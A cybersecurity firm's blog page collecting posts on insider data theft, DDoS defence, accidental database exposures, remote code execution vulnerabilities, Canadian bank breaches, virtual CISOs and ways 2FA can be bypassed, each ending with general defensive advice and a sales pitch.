Thought leadership. threat analysis, news and alerts.
How to Prevent Departing Employees from Departing with Your Organization’s Data
The practice of departing employees departing with their employers’ data has recently been highlighted in the latest case that sprung from one of the biggest tech companies Apple.
A special agent at the Federal Bureau of Investigation (FBI) recently filed a criminal complaint before the US District Court for the Northern District of California against a former Apple employee, alleging that the former Apple employee who worked as a hardware engineer on the company’s autonomous vehicle development team stole trade secrets from the company.
According to the FBI special agent, because of the former employee's role on Apple’s autonomous vehicle development project, he was granted broad access to secure and confidential internal databases containing trade secrets and intellectual property for the project.
After returning from a paternity leave, the said employee, according to the FBI special agent, resigned saying that he plans to move back to his home country and he also plans to work with another company also working in the field of autonomous vehicle technology.
The said employee turned over all Apple-owned devices and Apple's security then disabled his remote network access, badge privileges, network access and other employee accesses.
The criminal complaint revealed that data from Apple’s security team showed that days prior to his resignation, the former Apple employee’s network activity increased exponentially compared to the prior two years of his employment. On the evening two days prior to his resignation, the employee was shown via CCTV footage entering the autonomous vehicle software and hardware labs and leaving the building less than an hour later carrying a large box.
The criminal complaint also disclosed that in an interview with Apple security attorney and Apple employee relations representative, the accused former employee of Apple admitted downloading data to a non-Apple device, one that's owned by his wife, because he has "interest in platforms and wanted to study the data on his own." The accused also admitted to FBI agents of taking files from Apple’s autonomous vehicle development project and transferring the files to a non-Apple digital device, owned by his wife.
Files recovered from the non-Apple device included a 25-page document containing schematics for one of the circuit boards that form Apple's proprietary infrastructure technology for its autonomous vehicle development project.
FBI agents arrested the said Apple's former employee at the San Jose International Airport as he was about to leave the country.
Prevalence of Departing Employees Stealing or Leaking Corporate Data
The case filed against a former Apple employee is just one of the many cases of departing employees departing with their employers’ data.
In 2014, a Federal Court of Australia found sufficient evidence that a former employee of Leica Geosystems Pty Ltd copied 190,000 files from the company’s computers the day before he resigned. The files copied by the former employee included numerous source codes representing the core of the company’s intellectual property. The Federal Court of Australia ordered the said employee to pay AUD$50,000 to his former employer as fine for his misconduct.
In 2015, an employee of BlueScope, after learning she was to be terminated, downloaded 40 gigabytes of company documents. The company filed legal actions in the Federal Court of Australia and Singapore to stop the information falling into the hands of its competitors. BlueScope and the former employee reached a confidential settlement. The Federal Court of Australia, meanwhile, permanently restrained the BlueScope’s former employee from using the data that’s in her possession.
A survey conducted by Biscom showed the prevalence of departing employees departing with their employers’ data. The Biscom survey showed the following alarming findings:
Data Leak Prevention
1. Limit Employee Access to Data
Only give employees access to data needed to get their jobs done. For instance, engineers don’t need access to CRM systems.
2. Encrypt Critical Corporate Data
Ensure that critical corporate data, whether data is in-transit, at-rest and in-use, must be encrypted. Encryption ensures that even when there’s data breach, the data will remain useless.
3. Establish Regular IT Audits
While automated, preventative controls are the best defense, no technology is perfect. Establishing regular IT audits performed by an independent third-party will help you detect any outliers and detect data leaks and internal fraud early on. Such audits generally include
4. Require Appropriate Authentication for Critical Content
Accessing critical content must require not just a username and password but also multi-factor authentication. When critical content is being accessed, it also helps that approval must be secured first or an alert must be given to a compliance officer.
5. Regularly Monitor Network Activities
Unusual volume of downloaded data and non-office hours data access are examples of network activities that should be monitored. Said network activities are red flags for unauthorized activities and should be checked.
6. Keep Critical Data Offline
Don't store information vital to your organization, especially trade secrets, on any device that connects to the internet.
7. In-Person Data Security and Privacy Training
One of the means, though not a cure-all approach, of preventing departing employees from stealing corporate data is by providing an in-person data security training the moment the employee is hired.
One training session isn't enough. It's best to regularly remind employees about safeguarding company’s data by implementing a regular, formal cybersecurity awareness training. In addition to the in-person data security and privacy training, a confidentially or non-disclosure provision has to be included in the employment contracts.
8. Don’t Give Employees Administrator Privileges
Don’t give employees administrator rights for the company-supplied computers or devices. Giving them administrator privileges allows them to install malicious software (malware) that could lead to unauthorized access to information vital to your organization.
When you need help with either establishing regular IT Audits or performing data leakage assessments, help is a phone call away. Contact us today and protect your business.
DDoS Attacks: Protecting Your Business from Critical Disruption
In March 2018, developer platform GitHub was struck by the most powerful DDoS (distributed denial-of-service) attack ever recorded.
How big? 1.35 terabits of traffic was hitting GitHubeach second.
Still, GitHub was not without its defenses.
Within 10 minutes of the attack starting, GitHub’s DDoS mitigation service stepped in to combat it. They routed all incoming and outgoing traffic and scrubbed data, blocking all malicious packets responsible.
Such decisive action paid off. The attack ended eight minutes after the service took over, and GitHub was able to get back on track after just five minutes of downtime.
If GitHub had been without such a fast, effective response, the outcome of the attack might have been much worse.
A DDoS attack is a fairly cold-blooded attempt to disrupt a server, service or network’s standard operation by bombarding it with excessive traffic.
They incorporate a number of compromised computer systems to mount the attack, essentially overwhelming the target system and affecting genuine traffic.
GitHub had been targeted before, with an attack lasting for six days in 2015.
A company or organization’s website can be severely affected by a DDoS attack, potentially costing them lots of money in lost business. In fact, the average cost of a DDoS attack for businesses rose to more than $2.5 millionin 2017.
Research highlights just how common DDoS disruptions are for many companies. A staggering 849 of 1,010 enterprises questioned had been hit by a DDoS attack. DDoS disruption was estimated to cost target businesses as much as $100,000 per hour.
These figures make for disturbing reading, especially for smaller companies on a much tighter budget than their larger competitors. Still, even for global corporations, the risk of a DDoS attack can be incredibly troubling: after all, they may have more to lose.
Effective cybersecurity and preparation have never been more vital. Every cent available must be channeled into reinforcing your business against potential threats.
Still, this is easier said than done: cybercrime and security can be daunting. To help you understand how best to defend yourself against DDoS attacks, we have explored some of the most effective options below:
Get to know the symptoms
Recognizing the signs of an incoming DDoS attack can make a significant difference to how you handle it.
There is no real warning for a DDoS attack, though. While some hackers may issue threats, there will generally be nothing other than the assault itself.
As you might not browse your own website much on a day to day basis, it may not be until customers begin complaining about its performance than the warning bells start to sound.
However, certain other clues will tip you off:
The earlier you’re able to spot the warning signs, the sooner you can start to act.
Have a plan
Every business should have a plan in place for a potential DDoS attack. Once you confirm that your system has been targeted, you can jump to your plan and follow it. Being prepared helps to reduce the likelihood of panic or making mistakes that exacerbate the disruption.
Make sure all key players from each department are alerted to the situation and understand how best to handle it at their end. If everyone can work together and focus on damage limitation, you’re more likely to come out of the DDoS attack with minimal impact.
Companies that have no preparations for dealing with such a situation could waste valuable time trying to make sense of it.
Know how to prioritize
You will only have limited access to your system during a DDoS attack. Make sure you focus on keeping the most high-value services and applications running to preserve as much ‘normal’ function as possible.
Again, this comes down to planning. You should have an immediate idea which areas can be let go and which must be the priority.
Pay attention to your network security
Conducting security audits on your network on a regular basis is an effective way to keep your system protected.
Take a close look at the strength of passwords (particularly for the most vulnerable areas), review which employees have access to key data, and run comprehensive checks on software. Do you have the most up to date versions? Have any known security risks come to light with an application you’re using?
A network security audit may not be enough in itself to defend your business against a DDoS attack, but it can play a large part in the process. Incorporate this into ongoing workplace routines: make sure it becomes a habit and is never overlooked.
Letting your system go without the proper audits and preparations can leave it vulnerable to attack. Being complacent and assuming your business will escape the attention of cybercriminals is never a smart move.
Turn to the professionals
Your system security is paramount to keeping your business up and running. Not only does your entire flow of service depend on effective protection, so too does your customers’ experience.
Lengthy downtime can leave buyers with little choice but to start looking elsewhere if you cannot meet their needs. On top of this, they may wonder how safe their personal and financial data are within your company.
Hiring a professional cybersecurity firmto defend your system against DDoS attacks can help to take the strain. You will be free to focus on other areas of running your business while the experts handle the heavy lifting.
Are you concerned about your company’s vulnerability to DDoS attacks? What steps have you taken to safeguard your system? Share your thoughts and ideas below and contact ustoday to protect your organization.
How to Prevent Accidental Database Leaks
Florida-based marketing and data aggregation firm Exactis is the latest organization that accidentally leaked critical database online.
Security researcher Vinny Troia disclosed to Wiredthat early this month, Exactis exposed nearly 340 million records, 230 million of which pertain to U.S. consumers, while 110 million on business contacts.
"It seems like this is a database with pretty much every US citizen in it," Troia told Wired. "I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”
The close to 2 terabytes of data exposed by Exactis didn’t contain credit card information or Social Security numbers. It, however, revealed highly personal information, including phone numbers, home addresses, email addresses, religion, age, gender of the person's children, and interests like plus-size apparel and scuba diving.
Wired confirmed the authenticity of the data exposed by Exactis, commenting that in some cases the information is inaccurate or outdated.
Prior to his disclosure to Wired, Troia said he contacted both Exactis and the FBI about his discovery. He said Exactis has since protected the data so that it's no longer accessible to the public.
The number of data unintentionally exposed by Exactis exceeds that of the 2017's Equifax breach of nearly 148 million consumer’s data. The difference though is that in the case of Exactis, victims aren’t even aware that they’re part of the company’s database.
Past Incidents of Accidental Database Leaks
While the Exactis data may have been the largest accidental database leak, in the past few years, reports about accidental database leaks have come up again and again.
Another security researcher Chris Vickery discovered a number of accidental database leaks. In December 2015, Vickery discovered that the database that housed 3.3 million Hello Kittyaccounts was exposed as a result of a misconfigured MongoDB (a free and open-source cross-platform document-oriented database program) installation.
In April 2016, Vickery discovered that voter registration details of 93.4 million Mexican citizenswere exposed via publicly accessible database hosted on an Amazon cloud server.
In January 2017, Vickery also discovered that an Ontario-based plastic surgery clinicleaked thousands of customer’s medical records online via unprotected remote synchronization (rsync), a service which allows synchronization of files between two computers or servers over the internet.
In October 2017, Redlockresearchers reported that attackers infiltrated the Kubernotes (open-source platform designed by Google to automate deploying, scaling and operating application containers) console of Aviva, a British multinational insurance company, after the company failed to secure it with a password. One of Aviva’s Kubernetes pod contained credentials to the company’s Amazon Web Service Inc. account. According to Redlock, this enabled the attackers to steal the cloud compute resources of Aviva for cryptocurrency mining, in particular, mining the cryptocurrency Bitcoin.
In February 2018, Redlockresearchers reported that attackers similarly infiltrated the Kubernotes console of Tesla after the company failed to secure it with a password. One of Tesla’s Kubernetes pod contained credentials to Telsa’s Amazon Web Service Inc. account. Redlock said this enabled the attackers to steal the cloud compute resources of Tesla to mine the cryptocurrency Monero quietly in the background.
Accidental Leaks Discovery
According to Troia, he discovered the exposed Exactis’ database by simply using Shodan, an alternative search engine used by researchers and security professionals. Troia said he used Shodan to search for all ElasticSearch databases visible on publicly accessible servers with American IP addresses.
This search query resulted in about 7,000 results, Exactis database being one of them, unprotected by any firewall. ElasticSearch is a document-oriented database that's designed to be easily searched over the internet.
For his part, Vickery told ZDNet that he finds accidental database leaks via Shodan as well. There’s, however, no stopping for malicious hackers to use tools like Shodan to discover accidental database leaks. It’s a challenge then for ethical hackers like Troia and Vickery to discover and report to the concerned organizations regarding accidental database leaks before malicious hackers do.
"I’m not the first person to think of scraping ElasticSearch servers," Troia said in the case of Exactis’ accidental data leak. "I’d be surprised if someone else didn't already have this."
Data Leak Prevention
Here are some of the security best practices in preventing accidental database leaks:
1. Monitor Firewall Traffic
A firewall is your first line of defense in preventing accidental database leaks.
A firewall, which can be a hardware, software or both, monitors incoming and outgoing network traffic. It decides based on a defined set of security rules whether to allow or block specific traffic. For instance, a firewall can be configured to block data from certain locations or applications while allowing relevant data in.
RedLock reported that while firewall is one of the industry’s best practices, “85% of resources were found to have no firewall restrictions on any outbound traffic”.
While firewall is a good first line of defense, it can’t be the cure-all remedy in preventing accidental database leaks.
2. Monitor Configurations
Proper configuration is critical in preventing accidental database leaks. Configuration refers to the “Settings” menu in any software. A simple configuration monitoring could have prevented the Tesla breach.
3. Monitor Suspicious User Behavior
As shown by the above-mentioned examples, it’s not uncommon to find accidental database leaks in public cloud environments. Your organization needs to detect accidental database leaks as soon as possible before the bad guys do.
Monitoring has to go beyond geo-location or time-based anomalies but also monitoring event-based anomalies such as unusual volume of traffic or unusual volume of downloaded data.
When you team needs help, our team of experts is a phone call away. Contact ustoday and stay safe!
DDoS Attacks: Dangers and Ways to Protect your Network
DDoS (Distributed Denial of Service) attacks continue to make headlines. In the past week, one such act caused severe traffic issuesduring a key political debate in Mexico, affecting a website opposing presidential candidate Andres Manuel Lopez Obrador.
Elections are set to take place on 1 July, and the target domain has been openly critical of his policies. During the attack, 185,000 visits took place in just 15 minutes; the majority originated in China and Russia.
This was a blatant attempt to crash the site, and the culprits have yet to be identified. Doing so can be incredibly difficult, as the traffic originates from compromised systems that disrupt sites involuntarily.
This isn’t the first time DDoS attacks have disrupted political websites, and countries are taking action to defend themselves. The US Election Assistance Commission has dedicated over $380m in funding for cybersecurity.
DDoS attacks defined
As discussed above, DDoS attacks involve flooding the target website with traffic from numerous origin points, possibly numbering in the thousands. As a result, stopping the DDoS attack in its tracks is basically impossible; there’s no single IP address causing the issue, and blocking all traffic will be restricting access for legitimate visitors.
They’re different to DoS attacks, which involve just a single computer and IP address working in conjunction to flood a vulnerable system.
There are a few common types of DDoS attack, including traffic-based ones.
Bandwidth attacks are another danger, which overload the system with overwhelming loads of ‘junk’ data, disrupting network bandwidth. This can cause a total denial of service.
Application DDoS attacks use data messages to reduce the application layer’s resources and make the system unable to function as it should.
When a website is unable to provide its customers or members with the services they expect, it can damage their reputation and disrupt their revenue. There’s a risk to security too, with consumers left wondering how safe their personal data may be.
This is a major concern for today’s more tech-savvy users, who are much more aware of the dangers lax security measures and cyber-attacks pose.
Taking action against DDoS attacks
How can you protect your network against DDoS attacks and ensure your business or organization is prepared to handle one if the worst happens?
Minimize the potential
Minimizing the surface area that would be vulnerable to attacks is key, as it essentially reduces the number of options available to would-be DDoS attacks.
To do this, consider guarding resources with Load Balancers or Content Distribution Networks. You can also place restrictions on traffic reaching vital parts of your system, such as your database servers, for further protection.
Create a plan of action
You need a plan for every major cybersecurity risk threatening your business and customers. With a DDoS plan, the key aspect is determining how you will keep delivering services if an attack manages to disrupt your system.
You should make sure everyone within your company is made aware of what a DDoS attack is, how it may manifest, and how their work would be affected.
The aim is to make sure your company as a whole would essentially be able to roll with the proverbial punches, to minimize the disruption and get back on track as soon as possible.
Get to know the signs
It’s best to learn the warning signs of an impending DDoS attack. While high-volume situations are common and can be damaging, low-volume ones may be triggered by troublemakers as a test of your network’s capabilities. These attacks allow cybercriminals / hackers to identify potential holes within your security.
Pay attention to your average traffic patterns. This may help you spot significant changes in geographic sources and volumes, enabling you to take preventative action before the attack is fully underway.
Capture the packet
When you start to notice a DDoS attack is in effect, you should try to spot the key characteristics in order to take action against it. DDoS attacks typically rely on forceful traffic volumes your system simply can’t handle, and while it may be impossible to sort the ‘good’ traffic from the ‘bad’, you can identify telltale similarities between sources.
Run a fast packet capture of the attack, and you should be able to find similarities fairly easily as the majority of traffic hitting your website will be part of the attack. Giveaway details might reveal themselves in the user agent or URI, but once you find a pattern you’ll be able to initiate a block via router ACL or firewall.
Routers and firewalls can stop specific IP addresses and filter unnecessary protocols, but they’re not a complete defense against high-volume attacks. Firewalls in particular should not be depended on to keep your entire network safe.
Again, having a plan in place and being prepared to shift gears is critical to minimize the disruption as much as possible.
DDoS attacks are, sadly, not going to go away any time soon. Your business or organization has to take steps necessary to stay as protected as possible and put a contingency plan in place to stop your infrastructure collapsing if an attack takes place.
Working with cybersecurity specialists and running a vulnerability assessment of your network can help you prepare. Want to know more about the options available to you?
Give our expert team a call!
What is Remote Code Execution Attack & How to Prevent this Type of Cyberattack
Microsoft recently rolled out its latest security update, fixing 50 security vulnerabilities. Out of the 50 security vulnerabilities fixed by Microsoft in its June 12thsecurity update, 14 security vulnerabilities allow remote code execution.
What is Remote Code Execution?
Remote code execution (RCE) refers to the ability of a cyberattacker to access and make changes to a computer owned by another, without authority and regardless of where the computer is geographically located.
RCE allows an attacker to take over a computer or a server by running arbitrary malicious software (malware). "RCE (remote code execution) vulnerabilities are one of the most dangerous of its kind as attackers may execute malicious code in the vulnerable server," Impervasaid.
Remote Code Execution Example #1: Microsoft Excel Remote Code Execution Vulnerability
One example of a remote code execution vulnerability is the CVE-2018-8248vulnerability – one of the security vulnerabilities fixed by Microsoft in its June 12thsecurity update. The CVE-2018-8248 vulnerability, also known as “Microsoft Excel Remote Code Execution Vulnerability”, allows an attacker to run a malware on the vulnerable computer.
The CVE-2018-8248 attacker could take full control of the compromised computer if the owner of the compromised computer logs on to the computer with administrative user rights. In taking full control of the compromised computer, the attacker could view, change or delete data; install programs; or create new accounts with full user rights.
According to Microsoft, the delivery method in exploiting the CVE-2018-8248 vulnerability could be in the form of a malicious email with an attachment that contains a specially crafted file with an infected version of Microsoft Excel. Another delivery method in exploiting the CVE-2018-8248 vulnerability is in the form of a web-based attack scenario, whereby an attacker could host a website or compromised website that accepts or hosts user-provided content containing a specially crafted file designed to exploit the CVE-2018-8248 vulnerability.
In the 2 scenarios, malicious email and web-based attack, the attacker has to convince users to click on the attachment or a link to open the specially crafted file. To date, there’s no report that CVE-2018-8248 vulnerability has been exploited into the wild.
Remote Code Execution Example #2: Microsoft Windows SMB Vulnerability
On May 12, 2017, hundreds of thousands of computers worldwide were infected by WannaCry, a malware that encrypts computer files, locking out computer users and asks for ransom payment to decrypt or unlock the computer files.
WannaCry, as it turns out, is a malware that allows remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block (SMB) – a protocol used for sharing access to files, printers and other resources on a network.
Unlike other remote code execution attacks which leverage on malicious emails and web-based attacks as delivery methods, WannaCry’s delivery method was scanning the internet for vulnerable SMB ports and using one of the alleged U.S. National Security Agency (NSA) spying tools called “EternalBlue”, which takes advantage of the vulnerability in Microsoft’s SMB. Once an attacker detects SMB vulnerability, the DoublePulsar (another alleged NSA spying tool) is then used by an attacker to allow for the installation of the WannaCry malware.
EternalBlue and DoublePulsar are 2 of the spying tools allegedly used by the NSA that were leaked in April 2017 by a group of hackers who called themselves Shadow Brokers. According to Microsoft, the security vulnerabilities exposed by Shadow Brokers were fixed by the security update released by the company in March 2017 – a month before Shadow Brokers publicly released the alleged NSA spying tools.
Researchers at Renditionreported that in late April and the first few days of May 2017 – several days after Microsoft issued a security update fixing the security vulnerabilities exposed by Shadow Brokers, more than 148,000 computers were compromised by EternalBlue and DoublePulsar.
Hundreds of thousands of computers were infected by WannaCry as many compromised machines were used as servers and because of the worm or self-propagating capability of this malware. As a result, computers connected to the infected servers were also infected by the WannaCry malware.
Remote Code Execution Attacks and Cryptocurrency Mining
At the height of the cryptocurrency boom in December 2017, Imperva reported that cryptocurrency mining drove almost 90% of all remote code execution attacks.
Imperva said 88% of all remote code execution attacks in December 2017 sent a request to an external source to try to download a cryptocurrency mining malware.
“These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server,” Imperva said. “The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denies service to the application’s users.”
Timely patching or timely installation of software update ranks as the top cybersecurity measure in preventing remote code execution attacks.
For instance, to prevent remote code execution via CVE-2018-8248 vulnerability, Microsoft’s June 12, 2018 security update has to be installed. In the case of WannaCry cyberattack, remote code execution via the exploitation of Microsoft Windows SMB vulnerability could have been prevented if only Microsoft’s March 2017 security update had been timely applied.
To prevent attackers trying to infect vulnerable servers with cryptocurrency mining malware, the initial attack must be blocked. As an initial attack, cybercriminals typically exploit remote code execution vulnerabilities to launch their malware, similar to what WannaCry attackers did.
If your organization is using computers or servers that are known to be using software that’s vulnerable to remote code execution, the latest vendor patch to mitigate this particular cyberattack should be timely applied.
As a rule of thumb, to significantly minimize the risk, your company must collect, analyze and act on the most recent threat intelligence. Your IT team must be equipped with the best tool to apply patches timely thus mitigating the risk of a data breach. Better yet, workstation and server patching can and should be automated to prevent remote code execution and other cyberattacks.
2 Canadian Banks, BMO & CIBC’s Simplii Financial, Disclose Data Breaches
Two Canadian banks, Bank of Montreal (BMO) and Canadian Imperial Bank of Commerce-owned Simplii Financial, have disclosed early this week that cyber criminals may have stolen sensitive data of their combined 90,000 customers.
BMO is Canada’s 4thlargest bank, while the Canadian Imperial Bank of Commerce (CIBC) is the country’s 5thlargest bank.
A spokesman for Bank of Montreal told Reutersthat nearly 50,000 of the bank’s 8 million customers across Canada were hacked.CIBC’s Simplii Financial, meanwhile, disclosed that fraudsters may have stolen certain personal and account information for nearly 40,000 of its customers.
According to CBC, a group of cyber criminals who claimed to have stolen sensitive data from the 2 banks sent an email to media outlets across Canada last Monday. The attackers said that stolen data would be sold to criminals if the banks don’t pay a $1-million ransom to be paid in the cryptocurrency Ripple by 11:59 p.m. Monday.
The attackers claimed that they’ve harvested personally identifiable information from customers of the 2 banks, including social insurance number, date of birth, address and phone number.
To prove the veracity of the email, the sender shared the identifying information of two Canadians, one for each bank. When CBC contacted those 2 individuals, they confirmed the veracity of the identifying information.
The ransom deadline has already passed. When contacted by CBC about whether any ransom had been paid, Bank of Montreal said, "Our practice is not to make payments to fraudsters."
Simplii, for its part, said that it’s "continuing to work with cybersecurity experts, law enforcement and others to protect our Simplii clients' data and interests."
The attacks on BMO and Simplii are noteworthy as both were disclosed on the same day by the 2 financial institutions and both were attacked by the same cyber criminals using the same method.
The email sent out by the group who claimed to have stolen data from BMO and Simplii Financial explained in detail how the data breaches on the 2 financial organizations were carried out.
According to the email sender, bank accounts from the BMO and Simplii Financial were breached by using the Luhn algorithm – a set of mathematical rules that’ll help to calculate an answer to a problem, in this case, generate the card numbers.
Using the generated card numbers, the attackers then posed as authentic customers who had forgotten their password. The group said the generated card numbers allowed them to reset the backup security questions and answers and reset the passwords.
“They were giving too much permission to half-authenticated account which enabled us to grab all these information,” the email said.
In Simplii Financial's official statement, the organization advised customers to always "use a complex password and pin (eg. not 12345)”. This statement is indicative that the bank isn’t using 2-factor authentication. BMO, meanwhile, offers 2-factor authentication.
A customer at Simplii Financial told The Globe and Mailthat he was unable to log in to his account and the safety questions to recover his password had been changed.
In a study, Newcastle Universityresearchers found that it only takes seconds to guess a bank account number by using the first six digits (which tell you the bank and card type) and the Luhn’s algorithm. One of the original purposes of the Luhn’s algorithm is for the websites to immediately identify invalid card numbers.
"As an example, suppose one's credit card number is 5377223617291234. Here, the ‘4’ is the check digit. This digit can be determined solely from the digits that precede it through what is called the Luhn Algorithm,” the Oxford Math Centerexplains Luhn Algorithm. “If when entering this credit card number, one accidentally types a ‘7’ where the right-most "1" should be (i.e., 5377223617297234), the check digit produced from the first 15 digits, in accordance with the Luhn Algorithm, will now disagree with ‘4’ on the end – flagging this as an invalid credit card number.”
If you’ve an account in either BMO or Simplii Financial, it’s important to monitor your account for signs of unusual activity. Both banks are offering free credit monitoring and guarantee a 100% reimbursement for any unauthorized transaction.
The recent data breaches at BMO and Simplii Financial could’ve prevented by data encryption. Organizations, especially those in the financial sector, are required to safeguard personally identifiable information of their clients.
One of the ways of safeguarding sensitive information is by encrypting the data. Encryption changes the data into something incomprehensible, rendering the data useless to the attackers without the secret code.
“The banks involved in claims of a potential data breach acted swiftly in response, launched full-scale investigations and took immediate action to enhance online security measures to protect customers," the Canadian Bankers Association told Bloomberg.
“When you’re dealing with financial information, you should have the highest level of privacy protection possible,” Dr. Ann Cavoukian, former privacy commissioner of Ontario and a distinguished expert-in-residence who leads Ryerson University’s Privacy by Design Centre, told the Financial Post. “This is a real eye-opener. The question that that begs is why weren’t you engaging in those measures all along?”
Top 10 Benefits of a Virtual CISO
No company can afford to underestimate the importance of airtight cybersecurity.
Cyber-criminals continue to develop evermore sophisticated ways to attack organizations and exploit weaknesses. Global corporations invest heavily in protecting theirs and their clients’ assets, and even smaller enterprises should do the same.
Chief Information Security Officers (CISO) can make a monumental difference to an organization’s defence against risks. They are responsible for handling cybersecurity, creating strategies to reinforce systems against the most cutting-edge external threats. They need to ensure that all essential policies and procedures are in place to reduce the organization’s vulnerability.
However, bringing an in-house CISO into your office may not be viable if you lack the space and / or available funds.
Virtual CISOs are an effective, affordable alternative for businesses of all sizes, from tiny startups to international chains. Here are 10 key benefits of hiring one for your company.
1. Low-Cost Expertise
First and foremost, hiring a virtual CISO tends to be far cheaper than employing one full-time.
There are no overheads attached, no benefits to consider, no overtime or sick pay. You don’t have to pay them even when they’re sitting at their desk with nothing to do. You essentially reap all the rewards of bringing an invaluable asset into your organization without paying for anything other than their best work.
2. VCISOs Offer More Diverse Knowledge
Most virtual CISOs will possess a wealth of industry experience, having worked with numerous clients across varied sectors.
They are constantly implementing strategies to protect businesses of different sizes against changing threats, gaining valuable knowledge they can apply to your company’s security needs.
This is much more effective and reassuring than hiring a full-time, in-house CISO who may have only worked within one business environment during their career.
3. A Tighter Focus for Better Value
Your virtual CISO specializes in cybersecurity and keeping systems continually protected, developing strategies to reinforce your infrastructure. This is their core focus, their day-to-day commitment.
This is in sharp contrast to bringing an IT specialist into your company who will no doubt be expected to help other employees regain access to their computer, recover forgotten passwords, and remove low-threat malware after someone downloads something they shouldn’t.
You pay for your virtual CISO’s security expertise only, and their time is dedicated to it entirely without less-important distractions.
4. Less Disruption to Everyday Tasks
Hiring a virtual CISO will free up your employees, allowing them the time to focus on their day-to-day tasks and responsibilities without worrying about compliance or related technical issues.
This helps to ensure every department concentrates on their respective goals, free of security-related worries or tasks beyond their technical knowledge.
5. Invaluable Flexibility
Hiring a virtual CISO offers far greater flexibility than a full-time, in-house employee.
For a start, you don’t have to find a place within your company and budget for a new long-term worker. The additional costs that come with that (salary, insurance etc.) are of no concern either.
Furthermore, though, virtual CISOs will generally create tailored services for your exact needs. Perhaps you only want to hire them for a few months to see how it improves your security before committing to a multi-year arrangement. Maybe you’re planning to train your own IT specialists but need the virtual CISO to protect your company in the meantime.
Bringing a virtual CISO aboard in either of these situations is much more preferable to hiring a full-time employee and letting them go once you feel they have served their purpose.
6. Bespoke Service for your Business
Virtual CISOs are familiar with adapting to suit different companies with unique needs. While a CISO with experience within one or two businesses may be stuck in their ways and expect you to work around them, virtual specialists are happy to offer more bespoke services.
They will provide the ideal solutions for your company and processes.
7. Vital Industry Contacts
Virtual CISOs are more likely to have wide-ranging industry contacts from across their career. They tend to maintain relationships with fellow cybersecurity specialists, gain exclusive information on emerging threats, and build networks of useful connections.
Such contacts mean they will be able to learn more and gain additional support if they encounter a technical issue they haven’t seen before, enabling them to get a handle on the situation with minimal delay.
This might involve making a phone call to a thought leader or a contact on the front line of cyber-crime – solutions that in-house employees with little experience may be unable to offer.
8. Independent Expertise without Bias
In-house CISOs may be susceptible to the same distractions, petty arguments, and office politics as the rest of your workforce. This can lead them to lose focus on the task at hand and potentially develop their own agendas.
Maintaining the highest levels of security could seem less important to a disgruntled employee who feels they aren’t getting the respect they deserve. Virtual CISOs, though, tend to be completely neutral, channeling all their energy into protecting your company no matter what.
9. Minimal Disruption to your Organization
Your virtual CISO can work independently and without supervision. They will no doubt need to learn about your business and your operations, but they certainly don’t require any training or input.
They will be able to work quickly and efficiently, identifying potential vulnerabilities and updating your system for the utmost protection. Your business will be able to continue as normal without any of the time-consuming training or administrative duties involved with hiring a new full-time employee.
10. Ongoing Commitment and Quality
A CISO working as part of your in-house team will end up leaving you at one time or another, whether they are headhunted by a competitor or simply want a change. This can leave you without their expertise if you wait too long to bring a new specialist aboard, and means you have to start afresh again.
You can enjoy greater continuity and seamless service with a virtual CISO. Even if the person(s) assigned to your business leaves the company you hire, there will be no disruption – you may not even realize a change has occurred at all.
Do you have questions about working with a virtual CISO? Our expert team is here to answer them!
2-Factor Authentication Weakness: It’s also Hackable
The 2-factor authentication, also known as 2FA, is one cyberdefense that gets you one step away from cyberattackers. It shouldn’t be viewed, however, as a cure-all cyberdefense as it’s also vulnerable to other hacking activities.
What is 2-Factor Authentication (2FA)?
The 2-factor authentication is an added layer of security that’s designed to block cyberintruders even if they know your password. Verification codes can be sent via SMS text, email or verification apps like Google Auth. A special USB drive can also be used for 2-factor authentication.
Early Security Vulnerability of 2FA
Before 2FA became widely available to the public, this cybersecurity defense measure was used only by high-security government and corporate entities. One of the early adaptors of the 2FA was Lockheed Martin, the Pentagon’s No. 1 supplier.
In 2011, hackers were able to breach Lockheed Martin’s network using compromised 2FA codes. The supplier of Lockheed Martin’s 2FA codes, the RSA Security Division of the EMC Corporationacknowledged that it suffered a data breach that compromised one of its computer security products, the 2-factor authentication.
While it wasn’t disclosed what was breached at RSA, Whitfield Diffie,
one of the pioneers of public-key cryptography, told the New York Times that a "master key" – a massive secret number used as part of RSA’s encryption algorithm – might have been stolen.
The worst-case scenario, Diffie said, would be that the cyberattacker could reproduce cards that duplicate the ones supplied by RSA to generate two-factor authentication codes, enabling the cyberattacker to gain access to corporate networks and computer systems.
Here are 3 ways by which cybercriminals can hack 2-factor authentication:
1. Man-in-the-Middle Attacks
A man-in-the-middle (MITM) attack refers to a cyberattack where the attacker positions himself in a conversation between a computer user and a software application or a website. The attacker may eavesdrop or impersonate a software application or a website, making it appear as if a normal exchange of information is ongoing.
For instance, a MITM attacker may trick you into logging into a fake banking app and ask for your 2FA code. Once you input your 2FA code, you’re doomed.
An example of MITM attack that fools users into exposing their 2-factor authentication code is the malicious software (malware) called “Acecard”. One of the ways, Acecard is able to get inside the victims’ devices is by being listed as a legitimate game app in Google Play store. Once the Acecard app is installed on the victim’s mobile device, it lies in wait until the victim launches a legitimate banking app.
Once the malware detects which banking app is used, it then overlays a fake banking app interface, fooling the user that he’s inside a legitimate banking interface.
The login details entered in the fake app are then sent by the malware to the attacker and these details are used to login into the victim’s real banking app to withdraw money.
Acecard can convincingly impersonate a banking app by hijacking SMS message containing one-time password sent by the bank’s system as part of 2-factor authentication.
The SMS message containing one-time password sent by the bank’s system to the victim’s phone as part of two-factor authentication is then intercepted by the malware and sent to the attacker. The malware also intercepts and sends to the attacker the transaction confirmation.
Victims have, therefore, no knowledge about the SMS message as well as the transaction confirmation. Victims will only know about the withdrawal transaction when they check their bank account balance and transaction history.
A mobile banking malware like Acecard can hijack SMS messages by asking permission to access SMS.
According to Kaspersky, Acecard is capable of bypassing security measures of nearly 50 different online financial apps and services, including WhatsApp, Viber, Instagram, Skype, VKontakte, Odnoklassniki, Facebook, Twitter, Gmail and PayPal.
KnowBe4 Chief Hacking Officer Kevin Mitnick recently demonstrated how LinkedIn’s 2-factor authentication can be spoofed. Mitnick used the spoofing tool developed by white hat hacker Kuba Gretzky called “Evilginx”. In bypassing LinkedIn’s 2-factor authentication, Mitnick sends a user to a fake LinkedIn login page which runs Evilginx.
